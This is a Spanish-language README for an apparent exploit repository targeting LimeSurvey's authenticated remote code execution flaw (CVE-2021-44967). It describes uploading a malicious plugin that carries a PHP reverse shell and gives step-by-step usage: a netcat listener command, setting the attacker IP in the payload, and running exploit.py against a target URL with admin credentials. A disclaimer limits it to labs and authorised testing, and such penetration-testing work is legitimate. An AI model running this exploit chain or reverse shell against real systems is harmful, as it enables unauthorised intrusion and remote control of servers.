
🔥 Exploit automatizado de RCE para Limesurvey (CVE-2021-44967). Cadena de explotación optimizada para escalada de privilegios. 🚀
Este repositorio contiene un exploit funcional para CVE-2021-44967, una vulnerabilidad de Ejecución Remota de Código autenticada en LimeSurvey.
Probado y confirmado funcionando en:
La vulnerabilidad permite a un usuario autenticado con privilegios administrativos cargar un plugin malicioso. Dado que LimeSurvey no valida estrictamente el contenido del ZIP del plugin ni impide la ejecución de archivos PHP en el directorio de plugins, un atacante puede lograr RCE accediendo directamente a la shell cargada.
config.xml actualizado para compatibilidad con LimeSurvey versiones 3.0 a 6.0.Inicia un listener de netcat en tu máquina:
nc -lvnp 443
Edita php-rev.php y establece tu IP y puerto local:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Ejemplo:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: El script principal de automatización.php-rev.php: Payload de shell inversa PHP.config.xml: Archivo de configuración obligatorio del plugin de LimeSurvey.Esta herramienta es SOLO para fines educativos y pruebas de seguridad autorizadas. Estrictamente destinada para su uso en entornos controlados y legales (por ejemplo, CTFs, entornos de laboratorio o compromisos autorizados). El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala de manera responsable y solo en sistemas en los que tengas permiso explícito para probar.